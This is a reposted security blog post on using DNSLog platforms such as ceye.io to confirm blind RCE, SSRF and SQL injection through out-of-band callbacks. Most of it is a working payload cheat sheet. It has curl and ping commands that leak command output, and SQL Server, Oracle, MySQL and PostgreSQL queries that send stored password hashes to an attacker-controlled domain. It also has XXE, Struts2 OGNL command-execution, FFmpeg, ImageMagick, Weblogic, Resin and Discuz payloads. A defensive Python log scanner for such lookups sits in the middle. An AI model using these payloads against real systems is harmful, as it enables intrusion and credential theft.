DNSLOG | Exploitation Summary

0x00 The reason for writing this post: a question about RCE with no echoed output came up in a wb online interview, and this post fills that gap.

0x10 Several commonly used DNSLog platforms

1 http://ceye.io/
2 http://www.dnslog.cn/
3 https://github.com/BugScanTeam/DNSLog (open source; you can host your own instance)

0x20 What a DNSLog platform is for

    Many vulnerabilities nowadays give no way to echo output back, even though our payload has already executed, so we need a third-party DNSLog platform to confirm that the vulnerability really exists. DNSLog is mainly used with the following kinds of vulnerabilities:

1 RCE
2 SSRF
3 blind SQL injection
4 ...

0x30 How to use DNSLog

ceye.io is used as the example here.

Testing on the author's Windows system, I found that a command such as ping `whoami`.1u2gcq.ceye.io did not work; the result was that the host could not be found.

curl http://1u2gcq.ceye.io/whoami did not echo back the current user either.

The only command that worked:

ping %os%.12345.ceye.io

It works when the value inside %% is a system environment variable; if it is a locally defined variable, it may also fail to be expanded.

Below are some publicly available payloads:
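The defender-side counterpart of the mechanism above: an added example (not from the original post) that scans resolver query logs for lookups under DNSLog domains and pulls out the leftmost labels, which are where the leaked value (the %os% expansion, a hex-encoded hash, etc.) ends up. ceye.io, dnslog.cn and the 1u2gcq token come from the page; the log-line format and the sample lines are constructed.

```python
import re
from dataclasses import dataclass

# Watchlist of DNSLog/out-of-band domains (assumption: extend with your own).
OOB_SUFFIXES = ("ceye.io", "dnslog.cn")
# Hex-looking label, e.g. fn_varbintohexstr() output leaked via xp_dirtree.
HEX_RE = re.compile(r"(0x)?[0-9a-f]{12,}")
# Loose match for BIND-style query-log lines (constructed format; adjust to your resolver).
LOG_RE = re.compile(r"client .*?(?P<ip>\d+\.\d+\.\d+\.\d+)#\d+.*?query: (?P<qname>\S+) IN (?P<qtype>\w+)")

@dataclass
class OobHit:
    client: str
    qname: str
    ident: str      # platform account token (the page's example is 1u2gcq)
    leaked: tuple   # labels left of the token: the exfiltrated value(s)
    kind: str       # "probe" (no data), "hex" or "plain"

def analyze_query(client, qname):
    # Return an OobHit if qname sits under a watched OOB domain, else None.
    q = qname.rstrip(".").lower()
    for suffix in OOB_SUFFIXES:
        if not q.endswith("." + suffix):
            continue
        labels = q[: -(len(suffix) + 1)].split(".")
        ident, leaked = labels[-1], tuple(labels[:-1])
        if not leaked:
            kind = "probe"
        elif any(HEX_RE.fullmatch(label) for label in leaked):
            kind = "hex"
        else:
            kind = "plain"
        return OobHit(client, q, ident, leaked, kind)
    return None

def scan_log(lines):
    # Run analyze_query over every parsable query-log line.
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            hit = analyze_query(m["ip"], m["qname"])
            if hit:
                hits.append(hit)
    return hits

# Constructed sample log: ping %os%.<token>.ceye.io from a Windows host, a hex value
# leaked by a database OOB query, a normal lookup, and a bare probe with no data.
SAMPLE_LOG = [
    "client 10.0.0.5#51234 (windows_nt.1u2gcq.ceye.io): query: windows_nt.1u2gcq.ceye.io IN A + (10.0.0.2)",
    "client 10.0.0.7#44011 (0x0200abcdef01234567.1u2gcq.ceye.io): query: 0x0200abcdef01234567.1u2gcq.ceye.io IN A + (10.0.0.2)",
    "client 10.0.0.9#53001 (www.example.com): query: www.example.com IN A + (10.0.0.2)",
    "client 10.0.0.9#53002 (1u2gcq.ceye.io): query: 1u2gcq.ceye.io IN A + (10.0.0.2)",
]
```

Even a "probe" hit with no data labels is worth alerting on when the client is a database or application server that has no business resolving such domains.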

0x00 Command Execution
i. *nix:
curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io
ii. windows
ping %USERNAME%.b182oj.ceye.io
0x01 SQL Injection
i. SQL Server
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');
ii. Oracle
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;
iii. MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
iv. PostgreSQL
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();
0x02 XML Entity Injection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>
0x03 Others
i. Struts2
xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
ii. FFMpeg
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://ip.port.b182oj.ceye.io
#EXT-X-ENDLIST
iii. Weblogic
xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
iv. ImageMagick
push graphic-context
viewbox 0 0 640 480
fill 'url(http://ip.port.b182oj.ceye.io)'
pop graphic-context
v. Resin
xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf
vi. Discuz
http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo



Reposted from www.cnblogs.com/J0ng/p/13378956.html